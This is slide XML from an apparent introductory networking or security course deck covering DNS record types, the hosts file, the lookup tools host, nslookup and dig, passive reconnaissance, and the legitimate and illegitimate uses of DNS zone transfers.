            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quick Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4064DCA4-3919-4658-A770-640EE7B8FA6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="5915341" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The reason we remember “google.com” and not 142.250.65.78</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interconnected name servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requests for an IP associated with a name passed around until found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various records at play (just a few):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A – Name:IPv4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AAAA – Name:IPv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PTR – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IP:Name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MX – Mail Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TXT – Optional text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Graphical user interface, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4531ACC-69A1-435D-9C81-1D691569E48A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6442958" y="1614191"/>
            <a:ext cx="5544324" cy="4239217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20099660-F64C-42E1-94A5-EDAF43389E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6823199" y="1205517"/>
            <a:ext cx="4783842" cy="369332"/>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Example for an Amazon Route 53-hosted site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2475106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600469-BE1B-442F-BCFB-6BE4EEE8DC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76F517B-8C22-4463-ABB9-055FA99D4D00}"/>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/hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{588DBFFC-242B-4A1F-A108-772BE84ABFA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1336040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A local file that can be used to specify custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Name:IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mappings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be helpful to set values here to reference internal resources by name rather than IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F290F10-22B6-4241-BD7F-75C2D4C132E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3321935" y="2331347"/>
            <a:ext cx="5249008" cy="952633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B6B62E1-3E37-4388-9C3D-EFDBA21E1B55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="3395980"/>
            <a:ext cx="11363325" cy="55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Example: Arbitrary name for my local web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5459AB42-C2B9-471D-A4E4-C32A6BA46B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5268408" y="3877884"/>
            <a:ext cx="5887272" cy="2705478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60C410AA-6B4D-45E9-B072-722D38060D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="394625" y="3829044"/>
            <a:ext cx="6296904" cy="1190791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3344623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A411CE-B70C-4409-B658-4B107DF24212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="583579" y="2604544"/>
            <a:ext cx="5753903" cy="2181529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66061F65-5041-47D1-B7C1-E3C46E6A46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BB5A78E-D494-4C45-A2FC-9D644A06B51F}"/>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host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and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nslookup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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9FBB882B-0BF7-4C75-8068-18730604B0FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="980440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic queries – essentially the same tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also do forward lookups for specific hosts, like www or mail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7721A8F-717A-4E66-A3B5-92EDEDD1E259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4327298" y="3240199"/>
            <a:ext cx="7528606" cy="3091748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="432405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AC02F7-9025-485F-8347-64D461D951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9AACCA85-44E4-4529-93A9-51BC067B6CD2}"/>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dig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2878A4E-BC13-4415-8DE7-46BE67C5ED87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1082040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, slightly more robust output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also specify a specific nameserver to use with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@[Name|IP]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A4F2F53-4494-4033-80CC-6B0988A14CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="660575" y="2461047"/>
            <a:ext cx="10870850" cy="3124199"/>
            <a:chOff x="434050" y="2461047"/>
            <a:chExt cx="10870850" cy="3124199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{569CD206-C14A-4698-A5B9-1BA4F3BD0035}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6106234" y="2461047"/>
              <a:ext cx="5198666" cy="3124199"/>
              <a:chOff x="6106234" y="2461047"/>
              <a:chExt cx="5198666" cy="3124199"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Picture 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E236FDA8-9B62-479B-B6E0-B390A4AB06A4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6106234" y="2461047"/>
                <a:ext cx="5198666" cy="3124199"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85D86AAA-A7F0-4943-9276-A885756A6B20}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9299057" y="2461047"/>
                <a:ext cx="688223" cy="1815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7BC3196B-5BFA-4A01-B066-91FD7A63E89D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6281537" y="5001047"/>
                <a:ext cx="2161423" cy="1815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nvGrpSpPr>
            <p:cNvPr id="12" name="Group 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{120F432D-9F66-4292-8AD7-41080AE3E5B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="434050" y="2461047"/>
              <a:ext cx="5313313" cy="3101553"/>
              <a:chOff x="434050" y="2461047"/>
              <a:chExt cx="5313313" cy="3101553"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Picture 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5EE0F72-9E7E-4D03-B84D-4CCF44A973B6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="434050" y="2461047"/>
                <a:ext cx="5313313" cy="3101553"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Rectangle 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B955E50A-9341-4D84-AFD4-20D1232D1039}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="632577" y="5062693"/>
                <a:ext cx="2943743" cy="1815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8662131C-5649-4128-BD29-BC1AF7796B15}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="434050" y="4137179"/>
                <a:ext cx="3314990" cy="1815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47996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Passive Recon / Research</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3658361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506BDB-AE08-4157-BA7C-1C8C4CBDFB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B0D5AC7-DF52-4FE9-825F-2AC7118950F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zone Transfers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC072D5A-81FE-4A53-B9F8-E2DE8A1DF8F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1285240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legitimate use: Copy zone file from one server to another (e.g., backup)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Illegitimate use: Getting all the hosts in a zone if not locked down</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E472577-3BE6-41B0-94C4-F9576F7DD6E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="31223"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="2680241"/>
            <a:ext cx="7019076" cy="3194240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84755E24-3118-42AA-9FFD-F8F81F503B04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="941" r="9892"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815839" y="3669544"/>
            <a:ext cx="7254241" cy="2772162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62FD5BE5-C3C0-44FB-8966-FBD3EAD3A16B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693773" y="2680241"/>
            <a:ext cx="39164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rgbClr val="0D2541"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF6D2B"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="12700" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF6D2B">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SPOILERS!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83228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A453A5-4DD7-4F2C-B3F4-43AE0B1DD8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14A728CD-B7F4-4882-A454-5082EB58B184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Closing Thoughts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CFE50AD-53BE-4BEB-8AEF-15DC3052B3A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="7327581" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Covered a lot of ground</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Still more out there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key skill: research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Practice makes perfect</a:t>
            </a:r>
          </a:p>
          <a:p>
